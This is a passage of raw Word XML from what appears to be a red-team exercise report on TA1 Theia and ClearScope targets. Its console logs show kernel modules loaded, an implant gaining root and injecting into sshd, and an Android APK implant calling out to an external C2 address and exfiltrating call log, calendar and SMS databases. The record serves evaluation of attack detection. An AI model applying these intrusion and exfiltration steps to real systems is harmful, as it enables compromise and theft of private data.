    <w:p w14:paraId="5E58FC5A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">  Swap usage:   0%                 IP address for eth1: 128.55.12.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D5E9F5" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="277D1DA5" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">  Graph this data and manage this system at:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E6FAEB" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">    https://landscape.canonical.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0934B0C9" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="456ED753" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>New release '14.04.5 LTS' available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48476FDB" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Run 'do-release-upgrade' to upgrade to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779B0331" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10D65874" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A0C121E" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C1FB050" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Your current Hardware Enablement Stack (HWE) is no longer supported</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BBB55F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>since 2014-08-07.  Security updates for critical parts (kernel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A29BBDA" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>and graphics stack) of your system are no longer available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1878D5" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BE046AA" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>For more information, please see:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4603C5F1" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>http://wiki.ubuntu.com/1204_HWE_EOL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CD94C1" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ED080A8" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">There is a graphics stack installed on this system. An upgrade to a </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE4B75A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>supported (or longer supported) configuration will become available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245AB729" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>on 2014-07-16 and can be invoked by running 'update-manager' in the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473173F7" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Dash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3A9CED" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A313E8" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="093F5CAA" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>date-manager' in the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED28DC5" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Dash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E959841" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFEDFB6" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BD92ABF" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Last login: Wed May 15 18:49:26 2019 from 128.55.12.122</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3549D53A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C85E4DD" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>14:54</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A9E779" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>admin@ta1-theia-target-1:~$ sudo insmod ./load_helper.ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C21EA17" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">[sudo] password for admin: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1E6C17" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">admin@ta1-theia-target-1:~$ sudo insmod ./read_scan.ko  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76259262" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>admin@ta1-theia-target-1:~$ lsmod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6DA640" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Module                  Size  Used by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8FA769" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">read_scan              12510  0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F31C57" w14:textId="6972C91A" w:rsidR="00CE2C66" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="0097593C">
        <w:t xml:space="preserve">oad_helper            12516  0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424B9CAB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="161" w:name="_Toc12600089"/>
      <w:r>
        <w:t>Event Log (Cont)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="161"/>
    </w:p>
    <w:p w14:paraId="69C61BC5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:54</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70244003" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;elevate shm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B89F10" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Elevate current process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABAF8E8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] elevate success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EBE326" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01762736" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] uid: 0 root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCB0694" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03C82BF2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314A892B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*]  1162           1                  root                    (sshd)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137CF2D4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B7C73B0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:58</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306EFFC4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;inject sc /e5/dist/sshd-linux-x64 1162</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D56D5AD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] inject success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77500EA8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="554F47CE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D827E94" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;cd /var</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723EDE50" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;cd log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E38823" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EAA844" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] sshdlog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4614CA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67986C49" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:06</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7F23BB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718A9665" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        L1        128.55.12.167:55430 --&gt;   128.55.12.167:8108  [HTTP]  Wed May 15 14:47:51 2019        active 1076s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB89C3F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="014F0AF6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:07</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50642C66" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Left connection open overnight.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E082544" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="098A6957" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>20190517 13:46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF7D499" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Checked drakon on theia, lost connection at some point (active time not correct)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A3A894" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C871C0A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164BA984" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        L1        128.55.12.167:55430 --&gt;   128.55.12.167:8108  [HTTP]  Wed May 15 14:47:51 2019        active 169132s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB2E66C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;con L1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3EA34A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00290FB1" w14:textId="6DA44F56" w:rsidR="006C14C7" w:rsidRPr="0097593C" w:rsidRDefault="006C14C7" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[-] C</w:t>
      </w:r>
      <w:r w:rsidR="0097593C">
        <w:t>onnection lost for console [L1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BC27A8" w14:textId="1DC65732" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="162" w:name="_Toc12600090"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>15:39 -- TA1 ClearScope 2 -- Appstarter APK Micro APT Elevate</w:t>
      </w:r>
      <w:bookmarkEnd w:id="162"/>
    </w:p>
    <w:p w14:paraId="6B4A3098" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>The user installed and ran the Appstarter APK, which loaded the Micro APT shared object.  Micro APT connected out to 77.138.117.150:80 for C2.  During the attack, used benign activity to install the elevate driver on the phone.  Resumed the attack, using the driver for privilege escalation.  Used new privileges to exfil files calllog.db, calendar.db, and mmssms.db.  Took a screenshot, which had previously failed before elevate.  Left the connection open overnight but found that it had been lost by Friday.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18372BE3" w14:textId="469FD034" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="163" w:name="_9bzrhau5ngag" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="164" w:name="_Toc12600091"/>
      <w:bookmarkEnd w:id="163"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="164"/>
    </w:p>
    <w:p w14:paraId="179B4FE6" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-clearscope-translate-test</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.114</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Android 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C54F961" w14:textId="1584EC99" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="165" w:name="_8zl19aywgip3" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="166" w:name="_Toc12600092"/>
      <w:bookmarkEnd w:id="165"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="166"/>
    </w:p>
    <w:p w14:paraId="22EFDB60"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Appstarter APK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BFC33F"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Micro APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B22BC4" w14:textId="6778AB60" w:rsidR="00A351B2"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Elevate Driver (sl.ko, Driver)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69709BF3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="167" w:name="_Toc12600093"/>
      <w:r>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="167"/>
    </w:p>
    <w:p w14:paraId="201BAE05" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:39</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EFA924" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta51-bg-gen:~/apk$ scp appstarter-instr.apk user@128.55.12.114:.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6538B42D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
